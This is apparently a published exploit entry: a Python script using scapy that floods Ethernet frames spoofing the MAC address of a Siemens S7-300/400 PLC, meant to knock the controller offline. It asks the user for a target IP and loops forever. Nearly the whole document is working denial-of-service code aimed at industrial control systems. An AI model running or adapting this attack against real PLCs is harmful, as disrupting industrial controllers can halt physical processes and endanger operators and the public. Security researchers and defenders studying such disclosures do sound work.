# Exploit Title: Siemens S7 Layer 2 - Denial of Service (DoS) # Date: 21/10/2021 # Exploit Author: RoseSecurity # Vendor Homepage: https://www.siemens.com/us/en.html # Version: Firmware versions >= 3 # Tested on: Siemens S7-300, S7-400 PLCs #!/usr/bin/python3 from scapy.all import * from colorama import Fore, Back, Style from subprocess import Popen, PIPE from art import * import threading import subprocess import time import os import sys import re # Banner print(Fore.RED + r""" ▄▄▄· ▄• ▄▌▄▄▄▄▄ • ▌ ▄ ·. ▄▄▄· ▄▄▄▄▄ ▄▄▄ ▐█ ▀█ █▪██▌•██ ▪ ·██ ▐███▪▐█ ▀█ •██ ▪ ▀▄ █· ▄█▀▀█ █▌▐█▌ ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▐█ ▪▐▌▐█▄█▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ ▀ ▀ ▀▀▀ ▀▀▀ ▀█▄▀▪▀▀ █▪▀▀▀ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▄▄▄▄▄▄▄▄ .▄▄▄ • ▌ ▄ ·. ▪ ▐ ▄ ▄▄▄· ▄▄▄▄▄ ▄▄▄ •██ ▀▄.▀·▀▄ █··██ ▐███▪██ •█▌▐█▐█ ▀█ •██ ▪ ▀▄ █· ▐█.▪▐▀▀▪▄▐▀▀▄ ▐█ ▌▐▌▐█·▐█·▐█▐▐▌▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▐█▌·▐█▄▄▌▐█•█▌██ ██▌▐█▌▐█▌██▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ ▀▀▀ ▀▀▀ .▀ ▀▀▀ █▪▀▀▀▀▀▀▀▀ █▪ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀ """) time.sleep(1.5) # Get IP to exploit IP = input("Enter the IP address of the device to exploit: ") # Find the mac address of the device Mac = getmacbyip(IP) # Function to send the ouput to "nothing" def NULL (): f = open(os.devnull, 'w') sys.stdout = f # Eternal loop to produce DoS condition def Arnold (): AutomatorTerminator = True while AutomatorTerminator == True: Packet = Ether() Packet.dst = "00:00:00:00:00:00" Packet.src = Mac sendp(Packet) NULL() def Sarah (): AutomatorTerminator = True while AutomatorTerminator == True: Packet = Ether() Packet.dst = "00:00:00:00:00:00" Packet.src = Mac sendp(Packet) NULL() def Kyle (): AutomatorTerminator = True while AutomatorTerminator == True: Packet = Ether() Packet.dst = "00:00:00:00:00:00" Packet.src = Mac sendp(Packet) NULL() # Arnold ArnoldThread = threading.Thread(target=Arnold) ArnoldThread.start() ArnoldThread.join() NULL() # Sarah SarahThread = threading.Thread(target=Sarah) SarahThread.start() SarahThread.join() NULL() # Kyle KyleThread = threading.Thread(target=Kyle) KyleThread.start() KyleThread.join() NULL()